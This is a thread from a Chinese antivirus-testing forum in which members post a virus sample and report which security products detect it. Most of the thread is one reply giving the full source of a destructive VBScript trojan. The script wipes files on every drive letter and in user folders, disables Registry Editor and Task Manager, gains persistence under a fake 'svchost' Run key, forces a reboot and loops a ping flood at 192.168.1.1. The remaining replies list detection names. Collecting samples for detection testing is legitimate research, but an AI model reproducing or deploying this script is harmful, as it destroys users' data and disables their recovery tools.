查看: 1906|回复: 15
收起左侧

[病毒样本] 1X

[复制链接]
wwwab
发表于 2021-9-12 14:38:29 | 显示全部楼层 |阅读模式

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
biue
发表于 2021-9-12 14:39:34 | 显示全部楼层
卡巴斯基

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
dreams521
发表于 2021-9-12 14:40:20 | 显示全部楼层
  1. On Error Resume Next
  2. dim avest,xufso,wscrt
  3. Set avest = WScript.Createobject("WScript.Shell")
  4. Set wscrt = WScript.Createobject("WScript.Shell")
  5. Set xufso = CreateObject("Scripting.FileSystemObject")
  6. avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
  7. avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true
  8. avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true
  9. avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true
  10. avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true
  11. avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true
  12. avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true
  13. avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true
  14. avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true
  15. avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true
  16. avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true
  17. avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true
  18. avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true
  19. avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true
  20. avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true
  21. avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true
  22. avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true
  23. avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true
  24. avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true
  25. avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true
  26. avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true
  27. avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true
  28. avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true
  29. avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true
  30. avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true
  31. xufso.CreateFolder "C:\VBScript"
  32. wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"
  33. xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"
  34. xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"
  35. wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
  36. wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
  37. wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"
  38. wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"
  39. msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"
  40. do
  41. wscrt.run "ping 192.168.1.1 -l 65500 -t"
  42. loop
复制代码
琳辰
发表于 2021-9-12 14:43:00 | 显示全部楼层
本帖最后由 琳辰 于 2021-9-12 14:45 编辑

ESET detected.

111111.vbs - VBS/DelFiles.B trojan
anthonyqian
发表于 2021-9-12 15:06:44 | 显示全部楼层
SEP ISB.Downloader!gen52
暗_黑
发表于 2021-9-12 15:19:27 | 显示全部楼层
本帖最后由 暗_黑 于 2021-9-12 15:24 编辑

AVG MISS
VT上 avast和avg都杀了,我的咋没杀
VirusTotal




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
846472713
发表于 2021-9-12 15:36:54 | 显示全部楼层
ESET病毒库: 23947 (20210911)

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kim545
发表于 2021-9-12 15:42:12 | 显示全部楼层
BD Trojan.Script.DYD
1031184370
发表于 2021-9-12 15:52:43 | 显示全部楼层
846472713 发表于 2021-9-12 15:36
ESET病毒库: 23947 (20210911)

360直接刚下载就kill。
Nocria
发表于 2021-9-12 15:53:14 | 显示全部楼层
IKARUS

  1. Date and Time: 9/12/2021 3:52:54 PM
  2. File Size: 0.87 kB
  3. Detection Name: Trojan.BAT.Delfiles
  4. Detection-ID: 304049853
  5. Suggestion: Backup
  6. File Name: 4a6ce8c8-6936-4627-b9d0-ef8775ee1d3f.tmp
  7. Original Path: C:\360安全浏览器下载
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-4 22:01 , Processed in 0.120080 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表